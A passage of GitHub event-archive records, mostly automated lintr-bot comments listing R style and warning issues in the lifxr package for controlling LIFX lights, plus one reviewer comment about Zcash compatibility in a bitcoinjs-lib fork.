separately\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:84:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n                                                                                   ^\n```\n[R/lifx-server.R:3:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:5:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L5) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(\"http://localhost:56780/lights.json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:7:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L7) *style:* **Commented code should be removed.**\n```r\n​#     message(\"LIFX server could not be reached\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:9:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L9) *style:* **Commented code should be removed.**\n```r\n​#     message(\"ping! LIFX server is active.\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:11:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L11) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:13:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L13) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(paste0(\"http://localhost:56780/lights/\", selector))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:14:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L14) *style:* **Commented code should be removed.**\n```r\n​#   dat <- RJSONIO::fromJSON(content(results, as=\"text\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:16:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:17:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:19:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L19) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/on\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:21:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:23:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L23) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/off\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:25:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:26:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:28:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:28:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:30:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:31:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L31) *style:* **Lines should not be more than 80 characters.**\n```r\n​# server_color <- function(selector=\"all\", hue, saturation=1, brightness=1, duration=1){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Commented code should be removed.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:35:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:36:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L36) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to green, then restore previous setting\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:39:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:41:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L41) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:44:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L44) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:46:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:47:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:53:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L53) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:54:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L54) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to red\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:57:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L57) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:59:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L59) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:62:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L62) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:64:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:65:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L65) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:71:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:72:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[tests/testthat/test_inputs.R:8:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(1.1), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_inputs.R:9:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(-0.5), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T08:10:25Z"}
{"id":"8031891632","type":"CommitCommentEvent","actor":{"login":"coinblockers"},"repo":{"name":"karel-3d/bitcoinjs-lib"},"payload":{"comment":{"id":29867390,"position":24,"line":31,"path":"src/transaction.js","commit_id":"e35940d39c0548d8d5734b3bf5668d249e19a410","created_at":"2018-07-28T08:10:37Z","updated_at":"2018-07-28T08:10:37Z","author_association":"NONE","body":"removing Transaction.prototype.setOverwinter function and forcing versionGroupId e.g. will probably break all Zcash forks and lead into Block decode failed."}},"created_at":"2018-07-28T08:10:37Z"}
{"id":"8031892332","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"RMHogervorst/lifxr"},"payload":{"comment":{"id":29867391,"position":null,"line":null,"path":null,"commit_id":"6c37fb608513b781baa08a6dfae3b8ababd328af","created_at":"2018-07-28T08:11:14Z","updated_at":"2018-07-28T08:11:14Z","author_association":"NONE","body":"[R/lifx-cloud.R:3:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​BASE <- \"https://api.lifx.com\"\n^~~~\n```\n[R/lifx-cloud.R:4:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L4) *style:* **Variable or function name should be snake_case.**\n```r\n​VERSION <- \"v1\"\n^~~~~~~\n```\n[R/lifx-cloud.R:8:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(is.na(key))stop(\"No key found\")\n      ^\n```\n[R/lifx-cloud.R:12:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(hue < 0 | hue > 360){\n      ^\n```\n[R/lifx-cloud.R:18:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:24:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 0 | value > 1){\n      ^\n```\n[R/lifx-cloud.R:31:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(value < 2500 | value > 9000){\n      ^\n```\n[R/lifx-cloud.R:38:16:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​# except color. \n               ^\n```\n[R/lifx-cloud.R:43:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:51:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(results$status_code != 200)\n    ^\n```\n[R/lifx-cloud.R:58:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:60:74:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @param selector a string in format '[type]:[value]', where type can be \n                                                                         ^\n```\n[R/lifx-cloud.R:61:73:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' 'all', 'id', 'label', 'group', 'group_id', 'location', 'location_id', \n                                                                        ^\n```\n[R/lifx-cloud.R:63:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L63) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' which needs no value argument. \n                                 ^\n```\n[R/lifx-cloud.R:64:56:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return a list of all lights, status, and properties \n                                                       ^\n```\n[R/lifx-cloud.R:74:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:80:17:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L80) *warning:* **no visible global function definition for ‘lights’, Did you mean 'weights'?**\n```r\n​  light_list <- lights(selector = selector)\n                ^~~~~~\n```\n[R/lifx-cloud.R:81:21:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sapply(light_list, \n                    ^\n```\n[R/lifx-cloud.R:83:14:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​           if(light$color[[\"saturation\"]] > 0)\n             ^\n```\n[R/lifx-cloud.R:89:18:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​             else \n                 ^\n```\n[R/lifx-cloud.R:90:32:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​               paste(\"kelvin:\", \n                               ^\n```\n[R/lifx-cloud.R:91:46:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$color[[\"kelvin\"]], \n                                             ^\n```\n[R/lifx-cloud.R:93:50:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L93) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$brightness * 100, \"%\", \n                                                 ^\n```\n[R/lifx-cloud.R:100:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:106:67:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \n                                                                  ^\n```\n[R/lifx-cloud.R:107:42:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L107) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \"/toggle.json\"), \n                                         ^\n```\n[R/lifx-cloud.R:109:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L109) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:113:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:119:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L119) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Not exported because it conflicts with stats::power. see on() and off()\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:123:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(power = state, \n                                 ^\n```\n[R/lifx-cloud.R:124:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:126:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L126) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:131:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:138:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L138) *warning:* **possible error in power(\"off\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"off\", selector = selector, duration = duration)\n         ^~~\n```\n[R/lifx-cloud.R:143:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:144:19:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L144) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' power lights on \n                  ^\n```\n[R/lifx-cloud.R:150:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L150) *warning:* **possible error in power(\"on\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"on\", selector = selector, duration = duration)\n         ^~\n```\n[R/lifx-cloud.R:155:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L155) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:159:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L159) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power_on should the light be powered on if it is off? (FALSE just leaves light off)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:90:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n                                                                                         